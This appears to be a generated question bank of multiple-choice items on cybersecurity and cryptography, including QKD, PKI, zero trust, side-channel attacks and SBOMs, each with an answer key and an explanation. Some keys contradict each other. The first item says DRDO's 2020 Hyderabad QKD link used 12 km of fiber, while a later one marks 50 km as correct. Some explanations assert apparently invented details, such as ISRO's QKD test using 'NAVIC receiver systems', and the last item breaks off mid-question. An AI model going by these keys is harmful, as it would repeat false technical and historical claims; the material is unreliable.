1. The QKD-based secure communication link established between the DRDO's Hyderabad facilities in 2020 utilized satellite-based laser relay technology to bypass atmospheric turbulence, achieving a key generation rate of 10 Mbps.
2. Quantum Key Distribution (QKD) relies on the principles of quantum mechanics, specifically the no-cloning theorem, to ensure that any attempt at eavesdropping on the key generation process introduces detectable disturbances.
3. In February 2022, the Indian Space Research Organisation (ISRO) successfully demonstrated free-space Quantum Key Distribution over a distance of 300 meters between two buildings at the Space Applications Centre in Ahmedabad.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect.
Statement 2 is correct because QKD leverages the no-cloning theorem, which dictates that any measurement of a quantum state by an eavesdropper inevitably alters the state, thereby revealing the intrusion. Statement 3 is correct as ISRO successfully demonstrated free-space QKD over 300 meters at the Space Applications Centre in February 2022 using indigenously developed NAVIC receiver systems. Statement 1 is incorrect because the 2020 DRDO demonstration involved a fiber-optic link between two Hyderabad facilities over a distance of 12 km, not satellite-based laser relay, and the key generation rate was significantly lower than 10 Mbps.
Consider the following statements regarding End-to-end encryption protocols:
1. The Noise Protocol Framework is a collection of cryptographic patterns that allow developers to build secure channels by combining Diffie-Hellman key exchanges with symmetric encryption.
2. The PGP (Pretty Good Privacy) standard, developed by Phil Zimmermann in 1991, relies on a web of trust model to verify the authenticity of public keys.
3. The AES-256-GCM encryption standard is frequently employed within end-to-end encrypted messaging applications to provide both data confidentiality and authenticity.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
All three statements are correct: The Noise Protocol Framework is a modular library used by protocols like WireGuard and WhatsApp to establish secure communication channels; PGP, created by Phil Zimmermann in 1991, utilizes a decentralized 'web of trust' where users sign each other's public keys to verify identities; and AES-256-GCM is an industry-standard authenticated encryption mode that ensures both the secrecy of the message (confidentiality) and protection against tampering (authenticity) in modern messaging apps.
Consider the following statements regarding Zero Trust Architecture:
1. Micro-segmentation involves dividing network security into distinct zones, and the implementation of this technique is associated with the OSI model's physical layer protocols.
2. The Jericho Forum, established in 2004, introduced the concept of 'de-perimeterization' which functions as the primary technical framework for the NIST 800-207 standard.
3. The concept of 'Identity as the new perimeter' originated from the 2010 Forrester Research report by John Kindervag, which proposed the initial model for cloud-based firewall integration.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because micro-segmentation operates primarily at the application and network layers (Layer 3-7) of the OSI model, not the physical layer. Statement 2 is incorrect because while the Jericho Forum's 'de-perimeterization' influenced the philosophy of Zero Trust, it is not the primary technical framework for NIST 800-207, which is a standalone standard developed by the National Institute of Standards and Technology. Statement 3 is incorrect because, although John Kindervag coined the term 'Zero Trust' in his 2010 Forrester report, the concept focuses on 'never trust, always verify' rather than being a model specifically for cloud-based firewall integration.
Consider the following statements regarding Steganography detection techniques:
1. Digital watermarking is a subset of steganography that focuses on the imperceptible modification of media, and it is governed by the 1996 WIPO Copyright Treaty to prevent unauthorized detection of hidden metadata.
2. The visual attack method for steganography detection relies on the analysis of the Bit Plane Slicing technique, which identifies hidden data by isolating the most significant bit plane of a 24-bit color image.
3. Steganographic capacity is defined by the Kerckhoffs' principle, which posits that the security of the hidden message relies on the secrecy of the algorithm rather than the secrecy of the key.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because digital watermarking focuses on copyright protection and robustness rather than hidden communication, and it is not governed by the 1996 WIPO Treaty for the purpose of hiding metadata. Statement 2 is incorrect because visual attacks and Bit Plane Slicing rely on analyzing the Least Significant Bit (LSB) plane, as the Most Significant Bit (MSB) contains the primary image data and would cause visible distortion if altered. Statement 3 is incorrect because Kerckhoffs' principle states that a system should be secure even if everything about the system, except the key, is public knowledge; it does not define steganographic capacity, which refers to the maximum amount of data that can be embedded without causing detectable statistical anomalies.
Consider the following statements regarding Air-gapped Network Security:
1. Air-gapped networks often utilize data diodes for unidirectional information flow, a technology that was first standardized by the Common Criteria for Information Technology Security Evaluation in 1999.
2. The TEMPEST standard, developed by the NSA in 1972, provides for the shielding of electromagnetic emanations to prevent data leakage from air-gapped systems, and it is currently governed by the ISO/IEC 27001 certification process.
3. The concept of the 'Air-Gap' was formally integrated into the 2004 Federal Information Security Management Act, which provides for the classification of critical infrastructure as disconnected nodes.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
All three statements are incorrect because they contain historical and technical inaccuracies. Data diodes were not standardized by the Common Criteria in 1999, TEMPEST is a set of standards for preventing electromagnetic spying rather than an ISO/IEC 27001 certification, and the 2004 Federal Information Security Management Act (FISMA) does not formally integrate or define the concept of 'Air-Gap' for critical infrastructure. Air-gapping is a security measure involving physical isolation from unsecured networks, and these specific regulatory and historical claims do not align with established cybersecurity frameworks.
Consider the following statements regarding Adversarial Machine Learning in Cybersecurity:
1. The 2019 adversarial patch technique, which involves placing a localized image pattern on an object, functions by disrupting the global pixel distribution of the input to bypass deep learning object detectors.
2. The 2020 C&W (Carlini & Wagner) attack, known for its effectiveness against defensive distillation, operates by solving a constrained optimization problem that focuses on maximizing the L-0 distance between the original and adversarial images.
3. Model Inversion Attacks, as described in the 2015 Fredrikson et al. research, leverage the output layer's softmax probabilities to recover sensitive training data from models trained on high-dimensional genomic sequences.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because adversarial patches function by creating localized noise that overrides features within a specific region, rather than disrupting the global pixel distribution. Statement 2 is incorrect as the C&W attack minimizes, rather than maximizes, the L-p distance (including L-0, L-2, and L-infinity) to ensure the adversarial perturbation remains imperceptible. Statement 3 is incorrect because, while Fredrikson's 2015 research involved model inversion, it primarily targeted simpler models like decision trees and regression models to recover facial images, not high-dimensional genomic sequences via softmax probabilities.
Consider the following statements regarding Biometric template protection:
1. The General Data Protection Regulation (GDPR) Article 9, which came into force in 2018, classifies biometric data as special category data and permits the storage of raw biometric images if they are converted into a 128-bit hash.
2. The NIST Special Publication 800-53, updated in 2020, covers the implementation of biometric template protection and establishes the requirement for using RSA-2048 encryption for all local template storage.
3. Cancelable biometrics involves the intentional distortion of biometric features using a non-invertible transform, such that the original template cannot be reconstructed from the stored data.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect.
Statement 3 is correct because cancelable biometrics use non-invertible transforms to ensure that if a database is compromised, the original biometric data cannot be reconstructed, allowing for the revocation and reissue of templates. Statement 1 is incorrect because GDPR Article 9 classifies biometric data as special category data but does not mandate or permit the storage of raw images via 128-bit hashing; instead, it emphasizes data minimization and strict processing conditions. Statement 2 is incorrect because NIST SP 800-53 focuses on security and privacy controls for information systems and does not mandate RSA-2048 encryption for local biometric template storage, as such templates are typically protected using irreversible cryptographic hashes or secure enclaves rather than asymmetric encryption.
Consider the following statements regarding Software Bill of Materials:
1. The OWASP Dependency-Track platform integrates with the Common Platform Enumeration (CPE) database to generate automated legal compliance reports for software procurement departments.
2. NIST Special Publication 800-161 Revision 1 provides guidance on supply chain risk management and identifies the Software Bill of Materials as the primary tool for identifying unauthorized developer access.
3. The CycloneDX standard, which reached version 1.5 in 2023, serves as a lightweight SBOM specification designed for security context and supply chain component analysis.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect.
Statement 3 is correct as CycloneDX 1.5, released in 2023, is a widely adopted, lightweight SBOM standard optimized for security analysis and supply chain transparency. Statement 1 is incorrect because while OWASP Dependency-Track uses SBOMs for vulnerability management, it integrates with the National Vulnerability Database (NVD) via CVEs, not the CPE database for legal compliance. Statement 2 is incorrect because NIST SP 800-161 Rev. 1 focuses on supply chain risk management (SCRM) and identifies SBOMs as a tool for transparency and vulnerability tracking, not as a mechanism for detecting unauthorized developer access.
Consider the following statements regarding Public Key Infrastructure vulnerabilities:
1. The Certificate Transparency (CT) framework logs issued certificates in public append-only ledgers to detect mis-issuance, and the Google Chrome browser maintains a local database of these logs to verify certificate authenticity during the initial TLS handshake process.
2. In 2011, the Dutch Certificate Authority DigiNotar filed for bankruptcy after a security breach resulted in the fraudulent issuance of over 500 rogue SSL certificates, including those for domain names associated with Google.
3. The SHA-256 hashing algorithm is used to generate digital signatures for X.509 certificates, and the NIST SP 800-57 recommendation provides guidelines for key management lifecycles, including the automatic expiration of root certificates after a ten-year interval.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect.
Statement 2 is correct as the 2011 DigiNotar breach led to the fraudulent issuance of over 500 certificates, causing the CA's collapse. Statement 1 is incorrect because while CT logs are public, browsers do not maintain a local database of all logs for handshake verification; instead, they verify the presence of Signed Certificate Timestamps (SCTs) within the certificate itself. Statement 3 is incorrect because NIST SP 800-57 provides key management guidelines, but it does not mandate a fixed ten-year automatic expiration for root certificates, as root certificate lifespans are typically determined by organizational policy and security requirements.
Consider the following statements regarding Advanced Persistent Threats Detection:
1. APT groups frequently employ Domain Generation Algorithms (DGA) to facilitate command-and-control communication, making it difficult for static blacklists to block malicious traffic.
2. Indicator of Compromise (IoC) databases often track file hashes, such as SHA-256 signatures, to identify known APT-related binaries circulating within enterprise networks.
3. The Diamond Model of Intrusion Analysis, introduced in 2013, links four core features (adversary, capability, infrastructure, and victim) to map the operational structure of an APT campaign.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
All three statements are correct: DGA allows APTs to dynamically generate domain names, rendering static IP or domain blacklists ineffective; IoC databases rely on cryptographic hashes like SHA-256 to uniquely identify malicious files; and the Diamond Model, developed by Caltagirone et al. in 2013, provides a formal framework for mapping the relationships between the adversary, capability, infrastructure, and victim to understand the lifecycle of an intrusion.
Consider the following statements regarding Blockchain-based Identity Management:
1. The eIDAS Regulation, adopted by the European Parliament in 2014, establishes the legal framework for the European Blockchain Services Infrastructure and provides for the automatic recognition of DIDs across all member states.
2. Self-Sovereign Identity (SSI) models utilize the DID Document, which contains public keys and service endpoints, to enable authentication without a central identity provider.
3. The W3C Decentralized Identifiers (DIDs) v1.0 specification reached W3C Recommendation status on July 19, 2022, providing a framework for verifiable digital identities.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect.
Statement 1 is incorrect because the 2014 eIDAS Regulation focused on electronic identification and trust services for electronic transactions, whereas the European Blockchain Services Infrastructure (EBSI) was launched later in 2018 and is governed by different frameworks. Statement 2 is correct as SSI leverages DID Documents (stored on distributed ledgers) to allow users to authenticate themselves directly using public keys without relying on a centralized authority. Statement 3 is correct because the W3C officially standardized the DID v1.0 specification on July 19, 2022, establishing a global, interoperable standard for decentralized digital identifiers.
Consider the following statements regarding Homomorphic Encryption:
1. Homomorphic encryption allows for the decryption of data by a third-party cloud provider, provided the provider holds the public key generated by the Gentry-Halevi algorithm.
2. The TFHE library, first released in 2015, supports gate-by-gate bootstrapping and provides a framework for multi-party computation using the RSA-2048 encryption standard.
3. The BGV scheme, developed in 2011, focuses on leveled homomorphic encryption and utilizes the Learning With Errors problem to achieve quantum resistance in symmetric key protocols.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because homomorphic encryption is specifically designed to perform computations on encrypted data without ever requiring decryption by the cloud provider. Statement 2 is incorrect as TFHE (Torus Fully Homomorphic Encryption) is based on lattice-based cryptography, not RSA-2048, which is an asymmetric standard unsuitable for homomorphic operations. Statement 3 is incorrect because while the BGV scheme (2011) uses the Learning With Errors (LWE) problem, it is a lattice-based scheme designed for public-key encryption, not symmetric key protocols.
Consider the following statements regarding Software Bill of Materials:
1. The CISA 'SBOM-a-rama' workshops held in 2022 focused on the standardization of binary analysis techniques to ensure that software vendors provide full source code access to end-users.
2. The Software Transparency Initiative, launched by the Linux Foundation in 2019, coordinates the global distribution of SBOM metadata through a centralized blockchain ledger to prevent unauthorized software modifications.
3. The Common Vulnerabilities and Exposures (CVE) system serves as the foundational data structure for SBOMs, providing a standardized taxonomy for tracking the origin of third-party software dependencies.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
All three statements are incorrect because SBOMs are intended to list software components and dependencies, not to provide source code access (which is proprietary), nor do they rely on a centralized blockchain ledger or the CVE system as their foundational data structure. Specifically, CISA's SBOM initiatives focus on transparency and supply chain security rather than binary analysis for source code disclosure, the Linux Foundation's efforts (like SPDX) promote open standards rather than a centralized blockchain, and the CVE system is a database for vulnerabilities, whereas SBOMs utilize standards like CycloneDX or SPDX to track component inventory.
Consider the following statements regarding Network Intrusion Detection Systems:
1. The 2003 NIST Special Publication 800-94 provides guidelines for intrusion detection, and it categorizes NIDS as being capable of decrypting end-to-end encrypted TLS 1.3 traffic for packet inspection without requiring external key management.
2. Signature-based Intrusion Detection Systems (IDS) rely on a pre-compiled database of known attack patterns, often referred to as 'attack signatures', to identify malicious traffic.
3. The 1980 Anderson Report, commissioned by the U.S. Air Force, introduced the foundational concept of 'Computer Security Threat Monitoring and Surveillance', which led to the first commercial deployment of a signature-based IDS in 1984.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect.
Statement 2 is correct as signature-based IDS functions by comparing network traffic against a database of known threat patterns, similar to antivirus software. Statement 1 is incorrect because NIST SP 800-94 does not claim NIDS can decrypt TLS 1.3 traffic without external key management; TLS 1.3 is specifically designed to prevent such passive interception. Statement 3 is incorrect because while the 1980 Anderson Report is the foundational document for intrusion detection, the first commercial IDS (Intrusion Detection Expert System - IDES) was developed by SRI International later, and the first commercial product, 'Haystack', was not deployed until 1987.
Consider the following statements regarding Zero-day vulnerability exploitation:
1. The Common Vulnerabilities and Exposures (CVE) system, managed by the MITRE Corporation, assigns unique identifiers to publicly known cybersecurity vulnerabilities after they have been disclosed.
2. The Stuxnet worm, discovered in 2010, utilized four distinct zero-day vulnerabilities in the Windows operating system to target industrial control systems.
3. A zero-day vulnerability refers to a security flaw in software or hardware that is unknown to the vendor, leaving them with zero days to create a patch before it is exploited.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
The CVE system, maintained by MITRE, serves as the industry standard for tracking publicly disclosed vulnerabilities, while the 2010 Stuxnet attack is historically significant for being the first to weaponize four distinct zero-day exploits against industrial control systems. A zero-day vulnerability is defined by the lack of prior knowledge by the vendor, meaning the developer has had zero days to address the flaw before it becomes a target for exploitation. All three statements are factually accurate, as they correctly describe the tracking mechanism, a landmark historical case study, and the fundamental definition of the term.
Consider the following statements regarding Cross-Site Scripting Mitigation:
1. The X-XSS-Protection header, introduced by Google Chrome in 2008, functions by validating the server-side input against a predefined regex pattern to prevent reflected script injection.
2. The W3C's Subresource Integrity (SRI) standard, finalized in 2016, allows browsers to verify that fetched resources match a cryptographic hash, which effectively blocks all forms of DOM-based Cross-Site Scripting.
3. The Content Security Policy (CSP) Level 2 specification, published by the W3C in 2016, introduced the 'script-src' directive to restrict the sources from which scripts can be loaded.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect.
Statement 3 is correct because CSP Level 2 (2016) introduced the 'script-src' directive to mitigate XSS by restricting valid script sources. Statement 1 is incorrect because the X-XSS-Protection header was a browser-side heuristic filter, not a server-side regex validator, and it has been deprecated due to security bypasses. Statement 2 is incorrect because while SRI (2016) prevents tampering with third-party resources, it does not block all DOM-based XSS, as that often originates from the application's own legitimate, yet vulnerable, client-side code.
Consider the following statements regarding Cloud-native security posture management:
1. Cloud Workload Protection Platforms (CWPP) focus on the runtime security of containers and serverless functions, and the 2018 GDPR amendment includes specific provisions for the mandatory deployment of CWPP in European financial institutions.
2. The Shared Responsibility Model, as defined by major providers like AWS and Azure, places the burden of configuring network security groups and identity access management policies on the customer.
3. The Open Web Application Security Project (OWASP) Top 10 for Cloud, released in 2021, categorizes insecure interfaces and APIs as the leading cause of data breaches, which the ISO/IEC 27001 standard classifies as a physical security violation.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect.
Statement 2 is correct because the Shared Responsibility Model mandates that cloud customers are responsible for configuring security groups and IAM policies, while providers secure the underlying infrastructure. Statement 1 is incorrect as the 2018 GDPR does not mandate specific technical tools like CWPP for financial institutions. Statement 3 is incorrect because while OWASP identifies insecure APIs as a top risk, ISO/IEC 27001 classifies these as logical or application-level security issues, not physical security violations.
Consider the following statements regarding Side-Channel Attacks:
1. Cold boot attacks involve the physical retrieval of encryption keys from DRAM modules after a system power-down, a process facilitated by the residual charge in capacitors that was first described in the 2008 paper by researchers from Princeton University regarding the RSA-4096 algorithm.
2. The Heartbleed vulnerability, discovered in 2014, allows for the extraction of private keys from memory by exploiting a buffer over-read in the OpenSSL library during the TLS handshake phase of a hardware-based side-channel attack.
3. Electromagnetic side-channel analysis captures unintentional radio frequency emissions from computer monitors, a technique standardized under the TEMPEST program established by the United States Department of Defense in 1951 to secure AES-256 communications.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because while cold boot attacks exploit DRAM remanence, the 2008 Princeton research focused on general encryption keys, not specifically RSA-4096. Statement 2 is incorrect because Heartbleed is a software-based buffer over-read vulnerability in OpenSSL, not a hardware-based side-channel attack. Statement 3 is incorrect because TEMPEST was established to mitigate electromagnetic emanations for general information security, not specifically to secure AES-256, which did not exist until 2001.
Consider the following statements regarding Advanced Persistent Threats Detection:
1. The 2010 Stuxnet incident is widely documented as a landmark APT operation that utilized four zero-day vulnerabilities to target industrial control systems.
2. Sandboxing technology allows for the execution of suspicious code in an isolated environment, and the 2017 WannaCry outbreak was successfully mitigated by the global deployment of automated sandbox-based hardware firewalls.
3. User and Entity Behavior Analytics (UEBA) systems establish a baseline of normal network activity to detect deviations, often utilizing machine learning algorithms like Isolation Forests.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect.
Statement 1 is correct as Stuxnet, discovered in 2010, famously exploited four zero-day vulnerabilities to sabotage Iran's nuclear centrifuges. Statement 3 is correct because UEBA leverages machine learning models, such as Isolation Forests, to identify anomalies by comparing real-time behavior against established baselines. Statement 2 is incorrect because, while sandboxing is a valid security tool, the 2017 WannaCry ransomware spread rapidly via the EternalBlue exploit and was not mitigated by sandbox-based firewalls, but rather by the discovery of a 'kill switch' domain and subsequent emergency patching.
Consider the following statements regarding Public Key Infrastructure vulnerabilities:
1. The X.509 standard, which defines the format for public key certificates, specifies that the serial number field within a certificate is a unique integer assigned by the Certificate Authority to distinguish it from other certificates issued by that same entity.
2. The Diffie-Hellman key exchange protocol allows two parties to establish a shared secret over an insecure channel, and the FIPS 140-3 publication outlines the specific hardware security module requirements for storing root keys in government-issued certificates.
3. The Domain Validation (DV) process involves verifying the requester's control over a specific domain, and the CA/Browser Forum Baseline Requirements specify that Extended Validation (EV) certificates provide a higher level of encryption strength than standard organization-validated certificates.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is correct because the X.509 standard mandates that a Certificate Authority (CA) must assign a unique positive integer as a serial number to every certificate it issues. Statement 2 is incorrect because while FIPS 140-3 sets standards for cryptographic modules, it does not specifically dictate the storage requirements for root keys in government certificates, which are governed by specific federal policy frameworks like NIST SP 800-57. Statement 3 is incorrect because, while EV certificates involve more rigorous identity verification, they do not provide higher encryption strength; encryption strength is determined by the cipher suites and key lengths negotiated during the TLS handshake, which are identical for DV, OV, and EV certificates.
Consider the following statements regarding Side-Channel Attacks:
1. Cache-timing attacks rely on measuring the time taken to access specific memory locations, allowing an attacker to infer the cache state and potentially reconstruct secret keys used in AES encryption.
2. Acoustic cryptanalysis refers to the method of extracting sensitive information by analyzing the high-frequency sound emissions generated by electronic components like capacitors and inductors during cryptographic operations.
3. The Meltdown vulnerability, identified in 2017, specifically affects out-of-order execution processors and allows unauthorized processes to access kernel memory space.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct as cache-timing attacks exploit variations in memory access latency to leak cryptographic keys. Statement 2 is correct because acoustic cryptanalysis measures subtle sound emissions from hardware components like capacitors to derive secret data. Statement 3 is correct as Meltdown, disclosed in 2018 (discovered 2017), exploits speculative execution to bypass memory isolation between user applications and the kernel.
Consider the following statements regarding Quantum Key Distribution:
1. The BB84 protocol, proposed by Charles Bennett and Gilles Brassard in 1984, remains the foundational framework for QKD, utilizing the polarization states of single photons to transmit cryptographic keys.
2. The Defence Research and Development Organisation (DRDO) successfully tested an indigenous QKD system between two secure locations in Hyderabad over a distance of 50 kilometers in December 2020.
3. Quantum Key Distribution networks are inherently different from Post-Quantum Cryptography (PQC), as QKD provides information-theoretic security based on physical laws rather than the computational complexity of mathematical algorithms.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct as the BB84 protocol uses the quantum property of photon polarization to ensure secure key exchange. Statement 2 is correct because the DRDO successfully demonstrated this indigenous QKD technology between two labs in Hyderabad over 50 km of optical fiber in December 2020. Statement 3 is correct because QKD relies on the laws of quantum mechanics (like the no-cloning theorem) for security, whereas Post-Quantum Cryptography (PQC) relies on complex mathematical problems that are resistant to quantum computer attacks.
Consider the following statements regarding Network Intrusion Detection Systems:
1. Anomaly-based IDS models establish a baseline of 'normal' network behavior, typically using statistical analysis or machine learning algorithms to detect deviations that may indicate a security breach.
2. Host-based Intrusion Detection Systems (HIDS) operate by monitoring the internal state of a specific computing device, including system call logs and file integrity changes, rather than monitoring the entire network segment.
3. The Snort software, originally developed by Martin Roesch in 1998, functions as an open-source network intrusion detection and prevention system capable of performing real-time traffic analysis.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct because anomaly-based IDS uses behavioral baselines to identify deviations from established norms, often leveraging ML for predictive detection. Statement 2 is correct as HIDS focuses on individual host activities like system calls and file integrity, contrasting with NIDS which monitors broader network traffic. Statement 3 is correct because Snort, created by Martin Roesch in 1998, remains a foundational open-source tool for real-time packet sniffing and intrusion prevention.
Consider the following statements regarding Steganography detection techniques:
1. Chi-square steganalysis is a statistical method used to detect LSB embedding by measuring the deviation of the distribution of color pairs from the expected frequency in a cover image.
2. The Least Significant Bit (LSB) matching technique, introduced in academic literature around 1999, involves modifying the last bit of pixel values to hide data while minimizing visual artifacts.
3. The RS (Regular-Singular) steganalysis method, developed by Fridrich in 2001, calculates the pixel correlation coefficient to identify hidden data by measuring the variance in the spatial domain of JPEG images.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is incorrect.
Statement 1 is correct as Chi-square analysis detects LSB embedding by identifying the statistical imbalance in the frequency of adjacent color pairs (e.g., 2i and 2i+1). Statement 2 is correct because LSB matching (or LSB replacement) became a standard academic benchmark in 1999 for embedding data in the least significant bit of pixel values to remain imperceptible to the human eye. Statement 3 is incorrect because the RS steganalysis method, developed by Fridrich, relies on the classification of pixel groups into Regular, Singular, and Unusable states based on a discrimination function, rather than calculating simple pixel correlation coefficients or spatial variance.
Consider the following statements regarding Hardware Security Modules:
1. The FIPS 140-3 standard, which replaced FIPS 140-2 in 2019, introduces a requirement for all HSMs to incorporate biometric authentication sensors to verify the identity of the system administrator.
2. In cloud environments, Cloud HSM services allow users to maintain control over their encryption keys, with the provider typically offering a dedicated partition that isolates the user's cryptographic operations from other tenants.
3. The Hardware Security Module architecture relies on the AES-256 algorithm for internal key wrapping, and the 2001 NIST publication SP 800-57 provides the technical guidelines for the physical destruction of these modules.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect.
Statement 2 is correct because Cloud HSMs provide a dedicated, isolated partition for each tenant, ensuring cryptographic keys remain under the user's control rather than the cloud provider's. Statement 1 is incorrect because FIPS 140-3 focuses on enhanced security requirements and testing methodologies, but it does not mandate biometric sensors for administrators. Statement 3 is incorrect because while NIST SP 800-57 provides guidelines for key management, it does not cover the physical destruction of hardware; NIST SP 800-88 is the standard specifically dedicated to media sanitization and destruction.
Consider the following statements regarding Blockchain-based Identity Management:
1. In a blockchain-based identity system, the 'Issuer' signs a Verifiable Credential using their private key, which the 'Holder' then stores in a digital wallet for future presentation.
2. The ISO/IEC 18013-5 standard, published in 2021, defines the technical requirements for mobile driving licenses and integrates the use of Ethereum-based smart contracts for real-time verification of identity attributes.
3. The European Blockchain Services Infrastructure (EBSI) initiative, launched by the European Commission in 2018, incorporates verifiable credentials to facilitate cross-border identity verification.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect.
Statement 1 is correct as it accurately describes the decentralized identity model where Issuers sign credentials cryptographically for Holders to manage in digital wallets. Statement 3 is correct because the European Blockchain Services Infrastructure (EBSI), launched in 2018, utilizes W3C-compliant Verifiable Credentials to enable secure, cross-border digital identity verification across EU member states. Statement 2 is incorrect because while ISO/IEC 18013-5 (2021) does define the standard for mobile driving licenses (mDL), it relies on ISO-standardized cryptographic protocols like mdoc rather than Ethereum-based smart contracts for verification.
Consider the following statements regarding Zero-day vulnerability exploitation:
1. The Wassenaar Arrangement, updated in 2013, includes provisions for the export control of intrusion software and surveillance systems that could be used to exploit zero-day vulnerabilities.
2. Zero-click exploits, such as those identified in the Pegasus spyware case, allow for the compromise of a device without any user interaction by leveraging undisclosed vulnerabilities in messaging applications.
3. In 2021, the Microsoft Exchange Server zero-day attacks, attributed to the HAFNIUM group, exploited vulnerabilities categorized under CVE-2021-26855 and three other related flaws.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct because the 2013 Wassenaar Arrangement update introduced export controls on 'intrusion software' and surveillance tools to prevent the proliferation of cyber-weapons. Statement 2 is correct as zero-click exploits, like those used by Pegasus, bypass user interaction by triggering vulnerabilities in apps like iMessage or WhatsApp to gain unauthorized access. Statement 3 is correct because the 2021 Microsoft Exchange Server breach involved a chain of four zero-day vulnerabilities (CVE-2021-26855, 26857, 26858, and 27065) widely attributed to the state-sponsored threat actor HAFNIUM.
Consider the following statements regarding Cloud-native security posture management:
1. The NIST SP 800-53 framework, originally published in 2005, provides the foundational architecture for the Zero Trust model and functions as the primary regulatory standard for all private cloud data centers.
2. Cloud Security Posture Management (CSPM) tools utilize the principle of continuous monitoring to identify misconfigurations in cloud environments, such as publicly accessible S3 buckets or unencrypted storage volumes.
3. The MITRE ATT&CK framework for Cloud includes specific tactics for initial access, such as the exploitation of public-facing applications or the abuse of cloud service provider credentials.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect.
Statement 1 is incorrect because NIST SP 800-53 provides a catalog of security and privacy controls for federal information systems, not a foundational architecture for Zero Trust, nor is it a mandatory regulatory standard for all private cloud data centers. Statement 2 is correct as CSPM tools are specifically designed to automate the continuous monitoring of cloud environments to detect and remediate common misconfigurations like exposed storage buckets. Statement 3 is correct because the MITRE ATT&CK framework for Cloud explicitly maps adversary behaviors, including the exploitation of public-facing applications and the abuse of cloud service provider credentials, to specific tactical categories.
Consider the following statements regarding Public Key Infrastructure vulnerabilities:
1. Certificate Revocation Lists (CRLs) provide a mechanism for clients to verify certificate status, and the Online Certificate Status Protocol (OCSP) was introduced in RFC 2560 to reduce bandwidth overhead by replacing CRLs in all browser-based validation chains.
2. The RSA cryptosystem relies on the computational difficulty of factoring large prime numbers, and the PKCS#1 v2.1 standard defines the padding schemes used to prevent chosen-ciphertext attacks during key exchange.
3. The Heartbleed vulnerability, identified as CVE-2014-0160, allowed attackers to retrieve private keys from memory by exploiting a missing bounds check in the OpenSSL implementation of the TLS heartbeat extension.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect.
Statement 3 is correct as the Heartbleed vulnerability (CVE-2014-0160) exploited a missing bounds check in the OpenSSL heartbeat extension, allowing memory exposure. Statement 1 is incorrect because while OCSP reduces bandwidth, it does not replace CRLs in all validation chains; they often coexist as complementary mechanisms. Statement 2 is incorrect because RSA relies on the difficulty of factoring the product of two large prime numbers, not the prime numbers themselves, and PKCS#1 v2.1 focuses on RSA cryptography standards rather than solely preventing chosen-ciphertext attacks.
Consider the following statements regarding Adversarial Machine Learning in Cybersecurity:
1. The Fast Gradient Sign Method (FGSM), introduced in 2014 by Goodfellow et al., generates adversarial examples by calculating the gradient of the loss function with respect to the input data.
